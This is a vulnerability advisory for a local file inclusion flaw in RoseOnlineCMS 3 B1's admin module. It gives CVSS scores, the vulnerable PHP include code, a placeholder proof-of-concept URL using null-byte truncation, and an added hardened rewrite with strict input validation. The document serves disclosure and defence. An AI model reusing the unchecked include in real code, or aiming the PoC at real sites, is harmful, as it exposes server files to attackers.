RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion

2010.01.07
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion
(works only with magic_quotes_gpc = off)

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Date: 30.12.2009
[!] Remote: yes

[!] Code :

    <?PHP
    if (isset($_GET['write'])) {
        $argv = explode('-',$_GET['write']);
        settype($argv,'array');
        $_GET['admin'] = @$argv[0];
        $_GET['url'] = @$argv[1];
        $_GET['do'] = @$argv[2];
        $_GET['key'] = @$argv[3];
    }
    $admin = !isset($_GET['admin']) ? index : $_GET['admin'] ;
    if (is_file("modules/admin/".$admin.".php")) {
        include("modules/admin/".$admin.".php");
    } else {
        echo('Administrator page not found. <br><br> <a href=index.php>Click here to go back home</a>');
    }
    ob_end_flush();
    ?>

[!] PoC:

    [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI%00]
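A hardened form of the include shown above, as an added example that is not code from the advisory or from the RoseOnlineCMS project. The names `ADMIN_MODULE_DIR` and `resolve_admin_module()` and the base directory location are assumptions made for illustration.

```php
<?php
// Added example: validates the module name before it ever reaches include().
// ADMIN_MODULE_DIR and resolve_admin_module() are hypothetical names; the
// directory below is an assumption and must match the real install layout.
const ADMIN_MODULE_DIR = __DIR__ . '/modules/admin';

/**
 * Map a user-supplied module name to a file inside the admin module
 * directory, or return null when the name is not acceptable.
 */
function resolve_admin_module($requested, string $baseDir = ADMIN_MODULE_DIR): ?string
{
    // Reject arrays (?admin[]=x) and anything that is not a short identifier.
    // \A...\z anchors the whole string, so a trailing newline cannot pass.
    // The character class excludes '/', '\', '.' and NUL, so directory
    // traversal and %00 suffix truncation are refused regardless of the
    // magic_quotes_gpc setting or PHP version.
    if (!is_string($requested)
        || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $requested)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // base directory or module file does not exist
    }

    // Defence in depth: the canonical path (symlinks resolved) must still
    // sit directly under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return is_file($path) ? $path : null;
}

// Runs after the existing 'write' parsing, which also populates $_GET['admin'].
$module = resolve_admin_module($_GET['admin'] ?? 'index');
if ($module === null) {
    http_response_code(404);
    echo 'Administrator page not found.';
} else {
    include $module;
}
```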

References:

http://xforce.iss.net/xforce/xfdb/55207
http://www.securityfocus.com/bid/37529
http://www.exploit-db.com/exploits/10793
http://packetstormsecurity.org/0912-exploits/roseonlinecms-lfi.txt

